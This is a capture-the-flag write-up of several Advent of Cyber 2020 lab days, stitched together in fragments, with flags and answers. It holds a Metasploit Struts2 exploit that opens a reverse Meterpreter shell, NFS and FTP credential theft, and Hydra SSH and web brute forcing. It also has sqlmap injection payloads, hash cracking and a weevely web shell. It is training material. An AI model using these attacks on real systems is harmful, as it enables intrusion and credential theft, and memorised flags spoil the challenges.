Description: Get started with Cyber Security in 25 Days - Learn the basics by doing a new, beginner friendly security challenge every day leading up to Christmas.
Find and run a file as igor. Read the file /home/igor/flag1.txt
Answer:
THM{d3f0708bdd9accda7f937d013eaf2cd8}
Rather self-explanatory, just using the commands from the course material:
1 2 3 4 5 6 7 8
$ ssh holly@10.10.147.215 -p 65534
holly@ip-10-10-147-215:~$ find / -user igor -perm -4000 -exec ls -ldb {} \; ... -rwsr-xr-x 1 igor igor 221768 Feb 7 2016 /usr/bin/find -rwsr-xr-x 1 igor igor 2770528 Mar 31 2016 /usr/bin/nmap
Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 10.10.254.110 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /showcase.action yes The path to a struts application action VHOST no HTTP server virtual host
Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.9.19.77 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
Exploit target:
Id Name -- ---- 0 Universal
msf6 exploit(multi/http/struts2_content_type_ognl) > run
[*] Started reverse TCP handler on 10.9.19.77:4444 [*] Sending stage (3008420 bytes) to 10.10.254.110 [*] Meterpreter session 1 opened (10.9.19.77:4444 -> 10.10.254.110:40250) at 2020-11-22 20:53:09 +0100
$ sudo nmap -sSVC -p- 10.10.37.5 -v ... PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: PASV failed: 500 OOPS: invalid pasv_address | ftp-syst: | STAT: | FTP server status: | Connected to 10.9.19.77 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.2 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 14:6f:fc:4d:82:43:eb:e9:6e:f3:0e:01:38:f0:cb:23 (RSA) | 256 83:33:03:d0:b4:1d:cb:8e:59:6f:13:14:c5:a2:75:b3 (ECDSA) |_ 256 ec:b1:63:c0:6d:98:fd:be:76:31:cd:b9:78:35:2a:bf (ED25519) 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100003 3 2049/udp nfs | 100003 3 2049/udp6 nfs | 100003 3,4 2049/tcp nfs | 100003 3,4 2049/tcp6 nfs | 100005 1,2,3 20048/tcp mountd | 100005 1,2,3 20048/tcp6 mountd | 100005 1,2,3 20048/udp mountd | 100005 1,2,3 20048/udp6 mountd | 100021 1,3,4 34089/tcp6 nlockmgr | 100021 1,3,4 34461/udp6 nlockmgr | 100021 1,3,4 38253/tcp nlockmgr | 100021 1,3,4 38594/udp nlockmgr | 100024 1 45209/tcp status | 100024 1 45851/tcp6 status | 100024 1 45934/udp6 status | 100024 1 46122/udp status | 100227 3 2049/tcp nfs_acl | 100227 3 2049/tcp6 nfs_acl | 100227 3 2049/udp nfs_acl |_ 100227 3 2049/udp6 nfs_acl 2049/tcp open nfs_acl 3 (RPC #100227) 3306/tcp open mysql MySQL 5.7.28 | mysql-info: | Protocol: 10 | Version: 5.7.28 | Thread ID: 4 | Capabilities flags: 65535 | Some Capabilities: Support41Auth, ConnectWithDatabase, LongPassword, Speaks41ProtocolOld, SwitchToSSLAfterHandshake, IgnoreSpaceBeforeParenthesis, SupportsTransactions, IgnoreSigpipes, InteractiveClient, ODBCClient, DontAllowDatabaseTableColumn, FoundRows, Speaks41ProtocolNew, SupportsCompression, LongColumnFlag, SupportsLoadDataLocal, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults | Status: Autocommit | Salt: ^\x0E/' #\x12f\x037I#_R\\x19RK5\x1A |_ Auth Plugin Name: mysql_native_password | ssl-cert: Subject: commonName=MySQL_Server_5.7.28_Auto_Generated_Server_Certificate | Issuer: commonName=MySQL_Server_5.7.28_Auto_Generated_CA_Certificate | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2019-12-10T23:10:36 | Not valid after: 2029-12-07T23:10:36 | MD5: aac5 77b5 16cb e816 8de8 a245 96c9 9537 |_SHA-1: d1a1 0cbd a01d 636d 38a5 fd9c a908 e657 3ea1 0045 |_ssl-date: TLS randomness does not represent time 20048/tcp open mountd 1-3 (RPC #100005) 38253/tcp open nlockmgr 1-4 (RPC #100021) 45209/tcp open status 1 (RPC #100024) Service Info: OS: Unix ...
Exploiting the unprotected NFS:
1 2 3 4 5 6 7
$ showmount -e 10.10.37.5 Export list for 10.10.37.5: /opt/files *
$ sudo mount 10.10.37.5:/opt/files /mnt
$ cat /mnt/creds.txt
What is the name of the file running on port 21?
Answer:
file.txt
Classic FTP:
1 2 3 4 5 6 7 8 9 10
$ ftp 10.10.37.5 Connected to 10.10.37.5. 220 (vsFTPd 3.0.2) Name (10.10.37.5:noraj): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls
What is the password after enumerating the database?
Answer:
bestpassword
Classic MySQL:
1 2 3 4 5 6 7 8 9
$ cat file.txt remember to wipe mysql: root ff912ABD*
$ mysql -h 10.10.37.5 -u root -p MySQL [(none)]> show databases; MySQL [data]> show tables; MySQL [data]> SELECT * FROM USERS;
I can't believe the movie based on my favorite book of all time is going to come out in a few days! Maybe it's because my name is so similar to the main character, but I honestly feel a deep connection to the main character Wade. I keep mistyping the name of his avatar whenever I log in but I think I'll eventually get it down. Either way, I'm really excited to see this movie!
There is also a comment with probably the password:
Leaving myself a note here just in case I forget how to spell it: parzival
We can use wade / parzival credentials over RDP (3389) with Remmina.
[Optional] Elevate privileges and read the content of root.txt
Zip::File.open('final-final-compressed.zip') do |zip_file| zip_file.each do |entry| entry.extract files_extracted += 1unless entry.name[-4..] == '.zip' extract_next.push(entry.name) if entry.name[-4..] == '.zip' end end
extract_next.each do |filename| Zip::File.open(filename) do |zip_file| zip_file.each do |entry| entry.extract files_extracted += 1unless entry.name[-4..] == '.zip' content = entry.get_input_stream.read password = entry.name if /password/i.match?(content) files_11 +=1if /version.+1.1/i.match?(content) end end end
Use Hydra to bruteforce molly's web password. What is flag 1? (The flag is mistyped, its THM, not TMH)
Answer:
THM{2673a7dd116de68e85c48ec0b1f2612e}
HHTP form bruteforce:
1 2 3 4 5 6 7 8 9 10
$ hydra -l molly -P /usr/share/wordlists/passwords/rockyou.txt 10.10.162.26 http-post-form '/login:username=^USER^&password=^PASS^:F=incorrect' Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-29 16:49:49 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task [DATA] attacking http-post-form://10.10.162.26:80/login:username=^USER^&password=^PASS^:F=incorrect [80][http-post-form] host: 10.10.162.26 login: molly password: sunshine 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-29 16:50:02
Use Hydra to bruteforce molly's SSH password. What is flag 2?
Answer:
THM{c8eeb0468febbadea859baeb33b2541b}
SSH bruteforce:
1 2 3 4 5 6 7 8 9
$ hydra -l molly -P /usr/share/wordlists/passwords/rockyou.txt 10.10.162.26 -t 4 ssh Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-29 16:48:34 [DATA] max 4 tasks per 1 server, overall 4 tasks, 14344398 login tries (l:1/p:14344398), ~3586100 tries per task [DATA] attacking ssh://10.10.162.26:22/ [22][ssh] host: 10.10.162.26 login: molly password: butterfly 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-29 16:49:26
$ sudo nmap -sSVC -p- 10.10.206.220 -v ... PORT STATE SERVICE VERSION 4567/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 18:b6:1c:3e:64:9a:6e:62:98:45:7b:d6:b5:37:2d:e4 (RSA) | 256 87:16:c5:f5:0b:33:47:64:c7:c8:3e:b1:fc:da:60:c5 (ECDSA) |_ 256 3e:bf:51:b8:4b:f8:3b:f9:65:65:c8:87:9f:f7:a5:2b (ED25519) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ...
Crack sam's password and read flag1.txt
Answer:
THM{dec4389bc09669650f3479334532aeab}
Again SSH bruteforce:
1 2 3 4 5 6 7 8 9 10 11 12 13
$ hydra -l sam -P /usr/share/wordlists/passwords/rockyou.txt 10.10.206.220 -t 4 ssh -s 4567 Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-29 17:56:09 [DATA] max 4 tasks per 1 server, overall 4 tasks, 14344398 login tries (l:1/p:14344398), ~3586100 tries per task [DATA] attacking ssh://10.10.206.220:4567/ [4567][ssh] host: 10.10.206.220 login: sam password: chocolate 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-29 17:56:57
$ ssh sam@10.10.206.220 -p 4567
sam@ip-10-10-206-220:~$ cat flag1.txt
Escalate your privileges by taking advantage of a cronjob running every minute. What is flag2?
Answer:
THM{b27d33705f97ba2e1f444ec2da5f5f61}
Flag2 is in /home/ubuntu/.
We can't see cron jobs owned by other users.
But we foudn this:
1 2 3 4 5 6 7
sam@ip-10-10-206-220:~$ ls -lhA /home/scripts/ total 8.0K -rwxrwxrwx 1 ubuntu ubuntu 14 Dec 19 2019 clean_up.sh -rw-r--r-- 1 root root 5 Dec 19 2019 test.txt
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not re sponsible for any misuse or damage caused by this program
[*] starting @ 19:18:23 /2020-11-29/
[19:18:24] [INFO] testing connection to the target URL you have not declared cookie(s), while server wants to set its own ('PHPSESSID=dgs5jd152jp...112bg95coi'). Do you want to use those [Y/n] y [19:18:28] [INFO] checking if the target is protected by some kind of WAF/IPS [19:18:28] [INFO] testing if the target URL content is stable [19:18:28] [INFO] target URL content is stable [19:18:28] [INFO] testing if POST parameter 'log_email' is dynamic [19:18:29] [WARNING] POST parameter 'log_email' does not appear to be dynamic [19:18:29] [WARNING] heuristic (basic) test shows that POST parameter 'log_email' might not be injectable [19:18:29] [INFO] heuristic (XSS) test shows that POST parameter 'log_email' might be vulnerable to cross-site scripting (XSS) attacks [19:18:29] [INFO] testing for SQL injection on POST parameter 'log_email' [19:18:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [19:18:29] [WARNING] reflective value(s) found and filtering out [19:18:30] [INFO] testing 'Boolean-based blind - Parameter replace (original value)' [19:18:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [19:18:30] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [19:18:30] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)' [19:18:31] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' [19:18:31] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' [19:18:31] [INFO] testing 'Generic inline queries' [19:18:31] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' [19:18:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' [19:18:31] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' [19:18:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [19:18:42] [INFO] POST parameter 'log_email' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n [19:18:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [19:18:55] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found got a 302 redirect to 'http://10.10.95.214:80/index.php'. Do you want to follow? [Y/n] y redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] n [19:19:19] [INFO] target URL appears to be UNION injectable with 12 columns [19:19:19] [INFO] POST parameter 'log_email' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable POST parameter 'log_email' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection point(s) with a total of 77 HTTP(s) requests: --- Parameter: log_email (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: log_email=noraj@toto.fr' AND (SELECT 4787 FROM (SELECT(SLEEP(5)))zyYD) AND 'PUeG'='PUeG&log_password=noraj&login_button=Login
Type: UNION query Title: Generic UNION query (NULL) - 12 columns Payload: log_email=noraj@toto.fr' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b7a7171,0x554a754769714965464f564d7468734276675a767a6d525253716663534e744c417472564a594948,0x71786a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&log_password=noraj&login_button=Login --- [19:19:24] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [19:19:25] [INFO] fetched data logged to text files under '/home/noraj/.local/share/sqlmap/output/10.10.95.214'
$ john /tmp/sqlmap56o5f2b6144029/sqlmaphashes-x2usmm49.txt --wordlist=/usr/share/wordlists/passwords/rockyou.txt --format=raw-md5 Using default input encoding: UTF-8 Loaded 9 password hashes with no different salts (Raw-MD5 [MD5 128/128 AVX 4x3]) Warning: no OpenMP support for this hash type, consider --fork=4 Press 'q' or Ctrl-C to abort, almost any other key for status saltnpepper (santa_claus) 1g 0:00:00:01 DONE (2020-11-29 19:39) 0.5181g/s 7431Kp/s 7431Kc/s 59535KC/s filimani..*7¡Vamos! Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably Session completed
Santa has a secret! Which station is he meeting Mrs Mistletoe in?
$ weevely http://10.10.95.214/assets/images/posts/5fc3ee910fd35agent.phtml noraj weevely> id uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@server:/var/www/html/assets/images/posts $ cd /home www-data@server:/home $ ls user www-data@server:/home $ cd user www-data@server:/home/user $ ls flag.txt www-data@server:/home/user $ cat flag.txt
{"type":"error","@timestamp":"2020-11-29T19:27:45Z","tags":["warning","process"],"pid":2710,"level":"error","error":{"message":"Unhandled promise rejection. This error originated either by throwing inside of an async function without a catch block, or by rejecting a promise which was not handled with .catch(). (rejection id: 3)","name":"UnhandledPromiseRejectionWarning","stack":"ReferenceError: someELKfun is not defined\n at Object.<anonymous> (/root.txt:1:6)\n at Module._compile (module.js:652:30)\n at loader (/usr/share/kibana/node_modules/babel-register/lib/node.js:144:5)\n at Object.require.extensions.(anonymous function) [as .js] (/usr/share/kibana/node_modules/babel-register/lib/node.js:154:7)\n at Module.load (module.js:565:32)\n at tryModuleLoad (module.js:505:12)\n at Function.Module._load (module.js:497:3)\n at Module.require (module.js:596:17)\n at require (internal/module.js:11:18)\n at /usr/share/kibana/src/core_plugins/console/api_server/server.js:19:19\n at arrayEach (/usr/share/kibana/node_modules/lodash/index.js:1289:13)\n at Function.<anonymous> (/usr/share/kibana/node_modules/lodash/index.js:3345:13)\n at resolveApi (/usr/share/kibana/src/core_plugins/console/api_server/server.js:16:20)\n at handler (/usr/share/kibana/src/core_plugins/console/index.js:115:41)\n at Object.internals.handler (/usr/share/kibana/node_modules/hapi/lib/handler.js:96:36)\n at request._protect.run (/usr/share/kibana/node_modules/hapi/lib/handler.js:30:23)\n at module.exports.internals.Protect.internals.Protect.run (/usr/share/kibana/node_modules/hapi/lib/protect.js:64:5)\n at exports.execute (/usr/share/kibana/node_modules/hapi/lib/handler.js:24:22)\n at each (/usr/share/kibana/node_modules/hapi/lib/request.js:384:16)\n at iterate (/usr/share/kibana/node_modules/items/lib/index.js:36:13)\n at done (/usr/share/kibana/node_modules/items/lib/index.js:28:25)\n at Hoek.once (/usr/share/kibana/node_modules/hapi/lib/protect.js:52:16)\n at wrapped (/usr/share/kibana/node_modules/hoek/lib/index.js:879:20)\n at done (/usr/share/kibana/node_modules/items/lib/index.js:31:25)\n at Function.wrapped [as _next] (/usr/share/kibana/node_modules/hoek/lib/index.js:879:20)\n at Function.internals.continue (/usr/share/kibana/node_modules/hapi/lib/reply.js:108:10)\n at method (/usr/share/kibana/node_modules/x-pack/plugins/dashboard_mode/server/dashboard_mode_request_interceptor.js:44:7)\n at Items.serial (/usr/share/kibana/node_modules/hapi/lib/request.js:403:22)"},"message":"Unhandled promise rejection. This error originated either by throwing inside of an async function without a catch block, or by rejecting a promise which was not handled with .catch(). (rejection id: 3)"}